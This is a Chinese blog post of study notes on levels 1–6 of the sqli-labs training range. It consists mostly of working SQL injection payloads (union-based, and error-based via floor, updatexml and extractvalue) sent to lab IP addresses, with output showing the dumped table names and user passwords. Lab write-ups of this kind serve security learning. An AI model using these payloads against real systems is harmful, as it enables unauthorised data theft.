sqli-libs(1-6)闯关笔记(纯手注)

最新推荐文章于 2024-04-16 22:46:11 发布
最新推荐文章于 2024-04-16 22:46:11 发布
阅读量898 收藏 5
点赞数
分类专栏: 渗透基础 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40671478/article/details/107968190
版权

SQL/Less-1

单引号字符串型回显注入

1.判断闭合字符

http://182.92.220.201/Less-1/?id=1'
#报错信息use near ''1'' LIMIT 0,1' at line 1

http://182.92.220.201/Less-1/?id=1' and 1=1 -- =
#正常
#注意:注释符--后面要有空格

http://182.92.220.201/Less-1/?id=1' and 1=2 -- =
#异常
http://182.92.220.201/Less-1/?id=1 and 1=2 -- =
#正常
#初步判断为单引号字符型注入

2.求列数

http://182.92.220.201/Less-1/?id=1' order by 4 -- =
#报错

http://182.92.220.201/Less-1/?id=1' order by 3-- =
#正常

3.求显示位

http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,3 -- =

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CUFRpLGF-1597242111390)(D:\桌面文档\渗透测试\笔记\学习笔记\照片\image-20200811112128016.png)]

4.爆库名

http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,database() -- =
#爆出库名security

5.爆表名

http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =
#爆出表名emails,referers,uagents,users

6.爆列名

http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- =
#爆出列名id,username,password

7.爆字段

http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(id,username,password) from security.users -- =
#字段内容
/*1DumbDumb,2AngelinaI-kill-you,3Dummyp@ssword,4securecrappy,5stupidstupidity,6supermangenious,7batmanmob!le,8adminadmin,9admin1admin1,10admin2admin2,11admin3admin3,12dhakkandumbo,14admin4admin4
上面的显示很难区分字段 ,所以添加0x23 */

http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(0x23,id,0x23,username,0x23,password) from security.users -- =
#结果如下图所述

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fyENTk27-1597242111397)(D:\桌面文档\渗透测试\笔记\学习笔记\照片\image-20200811114035849.png)]

SQL/Less-2

1.判断闭合字符

?id=1'
#报错信息use near '' LIMIT 0,1' at line 1

?id=1' and 1=1 -- =
#报错

?id=1 and 1=1
#正常

?id=1 and 1=2 -- =
#异常
#初步判断为数字型SQL注入

2.求列数

?id=1 order by 4 -- =
#报错
?id=1 order by 3 -- =
#有回显,判断为3列

3.得显示位

?id=1 and 1=2 union select 1,2,3 -- =

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pUcCBA8h-1597242111400)(D:\桌面文档\渗透测试\笔记\学习笔记\照片\image-20200811115537668.png)]

4.爆库名

?id =1 and 1=2 union select 1,2,database() -- =
#爆出库名security

5.爆表名

?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =
#表名emails,referers,uagents,users

6.爆列名

?id = 1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_anme='users' -- =
#列名id,username,password

7.爆字段

?id=1 and 1=2 union select 1,2,group_concat(0x3a,id,0x3a,username,0x3a,password) from security.users -- =

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jnaSJKmH-1597242111406)(image-20200811123529323.png)]

SQL/Less-3

1.判断闭合字符

http://172.168.30.176/Less-3/?id=1'
#报错信息use near ''1'') LIMIT 0,1' at line 1

http://172.168.30.176/Less-3/?id=1' and 1=1 -- =
#报错

?id=1 and 1=1 -- =
?id=1" and 1=1 -- =
#均不报错

?id=1 and 1=2 -- =
?id=1' and 1=2 -- =
?id=1" and 1=2 -- =
#都显示正常,只能尝试其他字符

http://172.168.30.176/Less-3/?id=1') and 1=2 -- =
#最后发现id=1') and 1=2 -- =异常
?id=1') and 1=1 -- =
#显示正常
#初步判断为单引号变形字符型注入

2.求列数

http://172.168.30.176/Less-3/?id=1') order by 3 -- =
#有回显

http://172.168.30.176/Less-3/?id=1') order by 4 -- =
#报错

#判断列数为3列

3.求显示位

http://172.168.30.176/Less-3/?id=1') and 1=2 union select 1,2,3 -- =
#显示位在2,3列

4.爆库名

http://172.168.30.176/Less-3/?id=1') and 1=2 union select 1,2,database()-- =
#得库名security

?id=-1%27)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23
#爆所有数据库的名称

5.爆表名

?id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =
#表名emails,referers,uagents,users

6.爆列名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- =
#列名id,username,password

7.爆字段

?id=-1') union select 1,2,group_concat(0x23,id,0x23,username,0x23,password) from security.users -- =

SQL/Less-4

1.判断闭合字符

http://172.168.30.176/Less-4/?id=1'
#正常,且有回显

http://172.168.30.176/Less-4/?id=1"
#报错信息use near ''1'') LIMIT 0,1' at line 1

http://172.168.30.176/Less-4/?id=1") and 1=1 -- =
#正常

http://172.168.30.176/Less-4/?id=1") and 1=2 -- =
#异常
#初步判断为括号双引号字符型注入

2.求列数

http://172.168.30.176/Less-4/?id=1") order by 3-- =

3.求显示位

http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,3-- =
#显示位在2,3列

4.爆库名

http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,database()-- =
#得库名security

#爆所有数据库的名称
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata -- =

5.爆表名

http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- =
#表名emails,referers,uagents,users

6.爆列名

http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- =
#列名id,username,password

7.爆字段

http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(0x23,id,0x23,username,0x23,password) from security.users -- =

SQL/Less-5

1.判断闭合字符

?id=1'
#报错信息use near ''1'' LIMIT 0,1' at line 1

http://172.168.30.176/Less-5/?id=1' and 1=1 -- =
#

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5Rm5WsyU-1597242111409)(照片/image-20200812112914454.png)]

http://172.168.30.176/Less-5/?id=1' and 1=2 -- =

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PeeJw2hn-1597242111412)(照片/image-20200812113021609.png)]

初步判断为无回显的单引号注入

2.求列数

http://172.168.30.176/Less-5/?id=1' order by 3-- =

3.求显示位

http://172.168.30.176/Less-5/?id=1' and 1=2 union select 1,2,3 -- =
#无回显,只能进行盲注

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bCDF5UAF-1597242111414)(照片/image-20200812113329701.png)]

4.爆库名

第一种方法使用floor()报错函数参考文章:https://www.cnblogs.com/-zhong/p/10892439.html

http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果Duplicate entry 'security0' for key 'group_key'

第二种方法采用报错函数UPDATEXML (XML_document, XPath_string, new_value)

第一个参数:这一项可以用一个十六进制的字符代替,如"0x23"

第二个参数:报错注入时需要写入错误的格式来显示错误的信息

第三个参数:报错注入时可以加入任何字符

http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select concat(database())),0x7e),1) -- =
#结果显示 XPATH syntax error: '~security~'

5.爆表名

http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#表名emails,referers,uagents,users

第二方法

http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,(  select group_concat(table_name) from information_schema.tables where table_schema='security' ) ,0x7e),1) -- =
#结果 XPATH syntax error: '~emails,referers,uagents,users~'

6.爆列名

http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果显示Duplicate entry 'username0' for key 'group_key'

http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果显示 Duplicate entry 'password0' for key 'group_key'

第二种方法

http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,(  select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ,0x7e),1) -- =

7.爆字段

http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果为  Duplicate entry 'Dumb0' for key 'group_key'

http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select username from users limit 1,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果为 Duplicate entry 'Angelina1' for key 'group_key'

#这种方法只能一个个去爆字段
#实际上使用group_concat函数,就可以一下爆出所有字段

http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,(  select group_concat(0x23,username,0x23,password) from security.users) ,0x7e),1) -- =
#结果XPATH syntax error: '~#Dumb#Dumb,#Angelina#I-kill-you'

SQL/Less-6

1.判断闭合字符

http://172.168.30.176/Less-6/?id=1'
#显示正常,尝试双引号

http://172.168.30.176/Less-6/?id=1"
#报错信息syntax to use near '"1"" LIMIT 0,1' at line 1

http://172.168.30.176/Less-6/?id=1" and 1=1 -- =
#正常

http://172.168.30.176/Less-6/?id=1" and 1=2 -- =
#异常
#初步判断为括号双引号字符型注入

2.求列数

http://172.168.30.176/Less-6/?id=1" order by 4 -- =

3.求显示位

http://172.168.30.176/Less-6/?id=-1"  union select 1,2,3 -- =
#无回显,考虑报错注入

这次使用extractvalue(,)报错函数

第一个参数:可以用十六进制字符或者整数代替

第二个参数:用于写注入语句

4.爆库名

http://172.168.30.176/Less-6/?id=-1"  and extractvalue(1,concat(1,2,database())) -- =
#返回值为XPATH syntax error: 'security'

5.爆表名

http://172.168.30.176/Less-6/?id=-1"  and extractvalue(1,concat(1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) -- =
#返回值XPATH syntax error: 'emails,referers,uagents,users'

6.爆列名

http://172.168.30.176/Less-6/?id=-1"  and extractvalue(1,concat(1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) -- =
#返回值XPATH syntax error: 'id,username,password'

7.爆字段

http://172.168.30.176/Less-6/?id=-1"  and extractvalue(1,concat(1,2,(select group_concat(0x23,username,0x23,password) from security.users))) -- =
#返回值XPATH syntax error: '#Dumb#Dumb,#Angelina#I-kill-you,'

6/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’))) – =
#返回值XPATH syntax error: ‘id,username,password’


## 7.爆字段

```SQL
http://172.168.30.176/Less-6/?id=-1"  and extractvalue(1,concat(1,2,(select group_concat(0x23,username,0x23,password) from security.users))) -- =
#返回值XPATH syntax error: '#Dumb#Dumb,#Angelina#I-kill-you,'
理想三旬、
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlilabs过关手册入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中的mysql账号密码进行安装数据库的创建 介绍几个函数:   (1)version():查看数据库版本   (2)user():查看当前用户   (3)database():查看使用的数据库   (4) limit :limit子句来分批获取所有数据   (5)group_concat():一次性获取数据库信息。
sqlilabs靶场记录中级关(五)
wanan的博客
10-08 491
sqlilabs靶场记录中级关(五)
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
最新发布
2301_79355407的博客
04-16 1409
此文章为初学者在学习SQL入使用sqlilabs靶场的学习笔记,均为手工入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
sqli-lab 题解
weixin_33827731的博客
04-26 257
sqli-lab:1--后边必须跟空格,而且空格必须是url编码的,不然在url中是不识别的。eg:--%20 ,#的空格是%23order by 去发现列数union select 去显示要的数据,当order by不起作用的时候,当order by 不在末尾的时候。也可以用来判断列。如:mysql> SELECT * FROM users WHERE id =3 ...
sqli-libs系列
qq_43511094的博客
12-31 1540
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
sql_libs第一关
Xor0ne
02-17 1051
第一关通关笔记:2019/6/16 低等级详解的相关网站:https://www.jianshu.com/p/078df7a35671 http://www.storysec.com/dvwa-sql-injection.html dvwa的闯关:https://www.freebuf.com/articles/web/120747.html BP:https://blog.csdn.ne...
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65关的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个关卡的关键思路、解题方法以及可能遇到...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
sqli_libs通关教程
qq_48904485的博客
03-22 5272
less-1 单引号联合入 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnvwRRTo-1647921807254)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211023110308434.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmKZuH51-16479
SQL-libs漏洞思路总结
转瞬都有的博客
08-31 347
本文介绍了SQL入里面常用到的十大入方式,这里介绍的更多的是方法和技巧。如果需要更加详细的有关SQL漏洞的介绍,请关我,在我的SQL闯关栏里就有我对于SQL闯关内容的详解。最后希望读者能谅解本文是以大段的的文字进行叙述的,而没有参加更多的图片。其实我还是想更好的通过叙述的方式来让我的读者领略SQL-libs中的技巧和方法。最后希望能给看我作品的人得以启发和思考。
靶场系列:sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
weixin_54626591的博客
12-05 2643
sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
Sqli-labs通关攻略(持续更新ing
qq_50808416的博客
05-11 1417
sqli-labs详细攻略
sqli-labs 1~10关教程
jiji_king的博客
04-04 5685
sqlli-labs 1~10关教程 第一关 输入?id=1 出现如下图 输入id=1’ 出现语法错误 表示这里可能出现sql入漏洞 进一步尝试 输入 id=1’ --+ 发现回显正常 用order by 判断该语句有几列数据 ?id=1’ order by 3 --+ order by 3 回显正常 order by 4 显示错误 证明有三列数据 具体解释见: 于是使用 函数查询,此时要将id=1改为一个数据库不存在的数值 比如888,给后面查询语句留显示位。此时入语句为: ?id=
零基础学SQL入必练靶场之SQLiLabs(搭建+打靶)
热门推荐
Ms08067安全实验室
12-20 1万+
文章来源 | MS08067Web零基础就业班1期作业本文作者:giunwr、tyrant(零基础1期)SQLi-Labs是一个专业的SQL入漏洞练习靶场,零基础的同学学SQL入的时候,sqli-labs这个靶场是必练的,它里面包含了很多入场景,以及在sql入的时候遇到的各种问题,适用于GET和POST场景,包含了以下入:一、作业描述完成sqllibs前18关,尽可能使用多的方法二、s...
sql-libs 手工入步骤
m0_59035933的博客
08-13 1521
一.首先输入',发现有报错,很高兴的事情,说明有漏洞。 1.程序没有过滤特殊字符',提交的内容接过了sql引擎解析 2.回显的内容看到了MYSQL字样 二.输入:1’ or ‘1’=‘1 出现了大量信息,但是因为这一关的代码只能输出一组数据,所以看到的也只有一组数据 三.我们希望得到数据库的其他关键数据,所以要用到union联合查询。而联合查询的关键是需要知道主查询列数,因为联合查询需要和主查询的列数相同,不然会出现报错。所以我们使用ord...
sqli下载及安装(sqli-libs)-图文详解+phpStudy配置
wzhua的博客
09-12 3793
sqli下载及安装-图文详解 (配置phpStudy)+phpStudy下载链接 配置
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL入的实验室。通过完成各个关卡,您将能够了解和掌握SQL入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值